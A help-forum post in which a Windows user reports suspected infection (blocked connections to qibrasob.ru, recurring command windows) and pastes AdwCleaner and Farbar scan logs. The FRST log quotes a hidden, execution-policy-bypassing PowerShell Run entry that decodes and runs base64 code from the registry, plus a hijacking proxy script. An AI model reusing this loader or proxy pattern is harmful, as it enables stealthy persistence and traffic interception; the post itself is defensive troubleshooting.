Jump to content

Help , am i infected?

Runez
 Share

Recommended Posts

Runez

Runez

Posted
Posted

Hello I'm new to this forum,

i keep getting this blocked by Malwarebytes

-Website Data-
Domain: qibrasob.ru
IP Address: 62.210.172.214
Port: [50152]
Type: Outbound
File: C:\Windows\SysWOW64\msiexec.exe

I also keep getting popup CMD installing unknown application,

when i see own task manager it's shows taskeng.exe , it's keep showing  even after i had terminated it.

and because i'm a newbie , i did system restore..

the cmd popups stops, but my computer become unstable (slow response , sometimes freezer, and task manager sometimes cant be opened)

following the tutorial here, i have done couple of thing :

1. Try Scaning with Malwarebytes anti-malware

 result - cant finish the scan even after waiting 14hr (computer become freeze / Malwarebytes stop responding)

2. Adwcleaner

 result : 

# AdwCleaner 7.0.0.0 - Logfile created on Sun Jul 30 03:35:36 2017
# Updated on 2017/17/07 by Malwarebytes 
# Running on Windows 7 Ultimate (X64)
# Mode: clean
# Support: https://www.malwarebytes.com/support

***** [ Services ] *****

No malicious services deleted.

***** [ Folders ] *****

Deleted: C:\ProgramData\Mail.Ru
Deleted: C:\ProgramData\Application Data\Mail.Ru
Deleted: C:\Users\All Users\Mail.Ru
Deleted: C:\Users\AMD\AppData\Local\Mail.Ru
Deleted: C:\Users\AMD\AppData\Roaming\ProgSense
Deleted: C:\Users\AMD\AppData\Roaming\GrabPro
Deleted: C:\Program Files (x86)\orbitdownloader
Deleted: C:\Users\All Users\Documents\Guid
Deleted: C:\Users\Public\Documents\Guid
Deleted: C:\Users\AMD\AppData\Roaming\Event Monitor
Deleted: C:\Users\AMD\AppData\Roaming\WMPNetworkAcSvc
Deleted: C:\Users\AMD\AppData\Local\AdvinstAnalytics
Deleted: C:\Users\All Users\Documents\XMUpdate
Deleted: C:\Users\Public\Documents\XMUpdate
Deleted: C:\Users\AMD\AppData\Roaming\Microleaves
Deleted: C:\Program Files\Enigma Software Group
Deleted: C:\Users\AMD\AppData\Roaming\Enigma Software Group
Deleted: C:\sh4ldr
Deleted: C:\Users\AMD\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\spyhunter
Deleted: C:\Program Files (x86)\CalendarTool
Deleted: C:/Program Files\cc6a8b3c59162b988afae6435f068f15
Deleted: C:/Program Files\3bb3e72544991598455f3e86fb41a473


***** [ Files ] *****

Deleted: C:\Users\AMD\Favorites\Mail.Ru.url
Deleted: C:\Users\AMD\Favorites\Mail.Ru Агент - используй для общения!.url
Deleted: C:\Users\AMD\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HowToRemove.html.lnk


***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks deleted.

***** [ Registry ] *****

Deleted: [Data] - HKCU\Software\Microsoft\Internet Explorer\Main|Start Page [http://search.orbitdownloader.com]
Deleted: [Key] - HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\Software\ProgSense
Deleted: [Key] - HKCU\Software\ProgSense
Deleted: [Key] - HKLM\SOFTWARE\Orbit
Deleted: [Key] - HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\Software\Orbit
Deleted: [Key] - HKCU\Software\Orbit
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{000123B4-9B42-4900-B3F7-F4B073EFC214}
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{000123B4-9B42-4900-B3F7-F4B073EFC214}
Deleted: [Key] - HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{000123B4-9B42-4900-B3F7-F4B073EFC214}
Deleted: [Key] - HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{000123B4-9B42-4900-B3F7-F4B073EFC214}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{3F1D494B-0CEF-4468-96C9-386E2E4DEC90}
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4250488A-CB24-0893-C066-B1AEA57BCFF2}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{7854F00C-DC77-477E-A10E-603F48442D3B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\TypeLib\{A0880527-DC28-4EBB-BA27-D22102F22A9F}
Deleted: [Key] - HKLM\SOFTWARE\Classes\TypeLib\{BCDDE143-FAE3-4C57-B22B-C4E8678CFDC0}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{C55BBCD6-41AD-48AD-9953-3609C48EACC7}
Deleted: [Value] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar|{C55BBCD6-41AD-48AD-9953-3609C48EACC7}
Deleted: [Key] - HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C55BBCD6-41AD-48AD-9953-3609C48EACC7}
Deleted: [Key] - HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{C55BBCD6-41AD-48AD-9953-3609C48EACC7}
Deleted: [Value] - HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser|{C55BBCD6-41AD-48AD-9953-3609C48EACC7}
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\MenuExt\&Download by Orbit
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\MenuExt\&Grab video by Orbit
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\MenuExt\Do&wnload selected by Orbit
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\MenuExt\Down&load all by Orbit
Deleted: [Key] - HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\Software\csastats
Deleted: [Key] - HKCU\Software\csastats


***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries deleted.

***** [ Chromium (and derivatives) ] *****

Plugin deleted: Search Manager - 
SearchProvider deleted: AOL - aol.com
SearchProvider deleted: Ask - ask.com


*************************

::Tracing keys deleted
::Winsock settings cleared
::Additional Actions: 0

*************************

C:/AdwCleaner/AdwCleaner[S0].txt - [5408 B] - [2017/7/30 3:34:48]


########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt ##########

3. Farbar Recovery Scan Tools 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 29-07-2017
Ran by AMD (administrator) on AMD-PC (30-07-2017 10:48:54)
Running from C:\Users\AMD\Desktop
Loaded Profiles: AMD (Available Profiles: AMD)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Smadsoft) C:\Program Files (x86)\SMADAV\SMΔRTP.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Hi-Rez Studios) C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Apple Inc.) D:\Program Files\iTunes\iTunesHelper.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Smadav Software) C:\Program Files (x86)\SMADAV\SmadavProtect64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Steganos Software GmbH) C:\Program Files (x86)\OkayFreedom\OkayFreedomService.exe
(Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DTAgent.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
() C:\Windows\SysWOW64\PnkBstrA.exe
() C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Razer Inc.) C:\Program Files (x86)\Razer\Razer Cortex\RzKLService.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
() C:\Users\AMD\AppData\Local\MiPhoneManager\main\MiPhoneHelper.exe
(MY.COM B.V.) C:\Users\AMD\AppData\Local\MyComGames\MyComGames.exe
(Cyberlink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD\PDVDServ.exe
(Steganos Software GmbH) C:\Program Files (x86)\OkayFreedom\Notifier.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12503184 2012-06-11] (Realtek Semiconductor)
HKLM\...\Run: [iTunesHelper] => D:\Program Files\iTunes\iTunesHelper.exe [303928 2017-03-22] (Apple Inc.)
HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [3146704 2017-05-09] (Malwarebytes)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation)
HKLM-x32\...\Run: [RemoteControl] => C:\Program Files (x86)\CyberLink\PowerDVD\PDVDServ.exe [29696 2006-09-18] (Cyberlink Corp.)
HKLM-x32\...\Run: [LanguageShortcut] => C:\Program Files (x86)\CyberLink\PowerDVD\Language\Language.exe [49152 2006-09-29] ()
HKLM-x32\...\Run: [SMΔRT-Protection] => C:\Program Files (x86)\Smadav\SMΔRTP.exe [1814528 2017-05-21] (Smadsoft)
HKLM-x32\...\Run: [OKAYFREEDOM Notifier] => C:\Program Files (x86)\OkayFreedom\Notifier.exe [4047888 2016-06-29] (Steganos Software GmbH)
HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8698584 2016-04-16] (Piriform Ltd)
HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4958912 2016-11-17] (Disc Soft Ltd)
HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\Run: [MiPhoneManager] => C:\Users\AMD\AppData\Local\MiPhoneManager\main\MiPhoneHelper.exe [146224 2017-03-17] ()
HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\Run: [MyComGames] => C:\Users\AMD\AppData\Local\MyComGames\MyComGames.exe [5546704 2017-07-30] (MY.COM B.V.)
HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\Run: [{2B7032A0-5561-422F-BE3C-78694DD4F94A}] => powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\ZSYQAG').MrBFadzSpX))); <==== ATTENTION
HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\Policies\Explorer: [DisallowRun] 1
HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\Policies\Explorer\DisallowRun: [1] Mshta.exe
HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\Policies\Explorer\DisallowRun: [2] powershell.exe
HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\Policies\Explorer\DisallowRun: [3] bitsadmin.exe
Startup: C:\Users\AMD\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\w.lnk [2017-07-04]
ShortcutTarget: w.lnk -> C:\Users\AMD\AppData\Roaming\eeiQ7lT6kG.exe (No File)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.100.1
Tcpip\..\Interfaces\{0B54D4E3-C792-46C6-907A-8D65026C57F4}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{38C68C9E-E199-4048-A69D-3D5DC75B6142}: [DhcpNameServer] 192.168.100.1
Tcpip\..\Interfaces\{68E9DC45-676E-471D-9AB8-BB7ABFDB663A}: [DhcpNameServer] 192.168.43.1

Internet Explorer:
==================
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\Software\Microsoft\Internet Explorer\Main,Start Page = 
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-1646343962-1068419023-3029431551-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-1646343962-1068419023-3029431551-1000 -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxps://id.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wnf_ir_16_43&param1=1&param2=f%3D4%26b%3DIE%26cc%3Did%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuzytDtB0BtAyEzz0A0E0D0A0F0DzyyDyEtN0D0Tzu0StCyByCtDtN1L2XzutAtFtByEtFtByBtFyDtDtN1L1Czu1ByDtN1L1G1B1V1N2Y1L1Qzu2StAtByCtBtBtC0CtBtGyB0BzztDtGyBzy0D0CtGtCtB0AtDtGtB0CtCyEyB0CzztA0BtDyCzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0AyE0B0CtDyB0CtCtGtBtDzy0FtGyE0A0CyCtGzy0B0A0CtG0Bzz0F0CtAtByCyBtCyD0DtD2QtN0A0LzutBtN1B2Z1V1T1S1NzutCtDyDyDyE%26cr%3D1422809106%26a%3Dwnf_ir_16_43%26os_ver%3D6.1%26os%3DWindows%2B7%2BUltimate&p={searchTerms}
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2016-07-13] (Internet Download Manager, Tonec Inc.)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2010-03-25] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2016-07-13] (Internet Download Manager, Tonec Inc.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2010-03-25] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\ssv.dll [2016-08-15] (Oracle Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\jp2ssv.dll [2016-08-15] (Oracle Corporation)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-21] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-21] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-21] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-21] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: ojobnyh6.default
FF ProfilePath: C:\Users\AMD\AppData\Roaming\Mozilla\Firefox\Profiles\ojobnyh6.default [2017-07-30]
FF NewTab: Mozilla\Firefox\Profiles\ojobnyh6.default -> about:newtab
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\ojobnyh6.default -> Yahoo! Powered
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\ojobnyh6.default -> Yahoo! Powered
FF Homepage: Mozilla\Firefox\Profiles\ojobnyh6.default -> hxxp://search.orbitdownloader.com
FF Keyword.URL: Mozilla\Firefox\Profiles\ojobnyh6.default -> user_pref("keyword.URL", true);
FF NetworkProxy: Mozilla\Firefox\Profiles\ojobnyh6.default -> autoconfig_url", "data:text/plain, function FindProxyForURL(url, host) {if(isInNet(host, '192.168.0.0', '255.255.0.0')) return 'DIRECT'; \nif(host == 'us1-base.cd-n.net') return 'DIRECT'; \nif(host == 'us2-base.cd-n.net') return 'DIRECT'; \nif(host == 'us3-base.cd-n.net') return 'DIRECT'; \nif(host == 'us4-base.cd-n.net') return 'DIRECT'; \nif(host == 'jp1-base.cd-n.net') return 'DIRECT'; \nif(host == 'de1-base.cd-n.net') return 'DIRECT'; \nif(host == 'au1-base.cd-n.net') return 'DIRECT'; \nif(host == 'ca1-base.cd-n.net') return 'DIRECT'; \nif(host == 'ir1-base.cd-n.net') return 'DIRECT'; \nif(host == 'sg1-base.cd-n.net') return 'DIRECT'; \nif(host == 'kr1-base.cd-n.net') return 'DIRECT'; \nif(host == '127.0.0.1') return 'DIRECT'; \nif(host == 'localhost') return 'DIRECT'; \nif(host == 'sg1-base.cd-n.net') return 'DIRECT'; \nreturn 'HTTPS GE4DKLRYGYXDCNBYFY2DQIZRGQ3TANJSHAYDAMA.mycdns.com:443';}"
FF NetworkProxy: Mozilla\Firefox\Profiles\ojobnyh6.default -> type", 0
FF Extension: (No Name) - C:\Users\AMD\AppData\Roaming\Mozilla\Firefox\Profiles\ojobnyh6.default\Extensions\homepage@mail.ru [2017-07-30] [not signed]
FF Extension: (No Name) - C:\Users\AMD\AppData\Roaming\Mozilla\Firefox\Profiles\ojobnyh6.default\Extensions\search@mail.ru [2017-07-30] [not signed]
FF Extension: (No Name) - C:\Users\AMD\AppData\Roaming\Mozilla\Firefox\Profiles\ojobnyh6.default\Extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7} [2017-07-30] [not signed]
FF HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\Firefox\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2016-08-03]
FF HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\AMD\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\AMD\AppData\Roaming\IDM\idmmzcc5 [2017-07-30] [not signed]
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\dtplugin\npDeployJava1.dll [2016-08-15] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\plugin2\npjp2.dll [2016-08-15] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-06-28] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-06-28] (NVIDIA Corporation)
FF Plugin-x32: @real.com/nppl3260;version=6.0.12.450 -> C:\Program Files (x86)\Real Alternative\browser\plugins\nppl3260.dll [2010-02-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpjplug;version=6.0.12.448 -> C:\Program Files (x86)\Real Alternative\browser\plugins\nprpjplug.dll [2010-02-16] (RealNetworks, Inc.)
FF Plugin-x32: @t.garena.com/garenatalk -> C:\Program Files (x86)\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1646343962-1068419023-3029431551-1000: @my.com/Games -> C:\Users\AMD\AppData\Local\MyComGames\NPMyComDetector.dll [2017-05-04] (MY.COM B.V.)
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\itms.js [2017-03-23]

Chrome: 
=======
CHR DefaultSearchURL: Default -> hxxps://duckduckgo.com/?q={searchTerms}
CHR DefaultSearchKeyword: Default -> duckduckgo
CHR DefaultSuggestURL: Default -> hxxps://ac.duckduckgo.com/ac/?q={searchTerms}&type=list
CHR Profile: C:\Users\AMD\AppData\Local\Google\Chrome\User Data\Default [2017-07-30]
CHR Extension: (Google Slides) - C:\Users\AMD\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-07-30]
CHR Extension: (Google Docs) - C:\Users\AMD\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-07-30]
CHR Extension: (Google Drive) - C:\Users\AMD\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-07-30]
CHR Extension: (YouTube) - C:\Users\AMD\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-07-30]
CHR Extension: (Google Sheets) - C:\Users\AMD\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-07-30]
CHR Extension: (Google Docs Offline) - C:\Users\AMD\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-07-30]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\AMD\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2017-07-30]
CHR Extension: (Chrome Web Store Payments) - C:\Users\AMD\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-07-30]
CHR Extension: (Gmail) - C:\Users\AMD\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-07-30]
CHR Extension: (Chrome Media Router) - C:\Users\AMD\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-07-30]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2016-08-05]
CHR HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2017-03-17] (Apple Inc.)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [1536520 2017-07-19] ()
R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1473216 2016-11-17] (Disc Soft Ltd)
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [242960 2016-11-01] (EasyAntiCheat Ltd)
S3 FLEXnet Licensing Service; C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [654848 2016-08-03] (Macrovision Europe Ltd.) [File not signed]
U2 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2016-10-10] (Hi-Rez Studios) [File not signed]
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4470736 2017-05-09] (Malwarebytes)
S3 npggsvc; C:\Windows\SysWOW64\GameMon.des [5999752 2016-08-22] (INCA Internet Co., Ltd.)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [495040 2017-06-28] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [495040 2017-06-28] (NVIDIA Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-06-28] (NVIDIA Corporation)
R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [449984 2017-06-28] (NVIDIA Corporation)
R2 OkayFreedom VPN Starter Service; C:\Program Files (x86)\OkayFreedom\OkayFreedomService.exe [341024 2016-06-29] (Steganos Software GmbH)
S3 PAExec; C:\Windows\PAExec.exe [189112 2017-07-21] (Power Admin LLC)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76152 2017-07-27] ()
R2 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [189264 2016-09-25] ()
R2 RzKLService; C:\Program Files (x86)\Razer\Razer Cortex\RzKLService.exe [133376 2016-09-28] (Razer Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

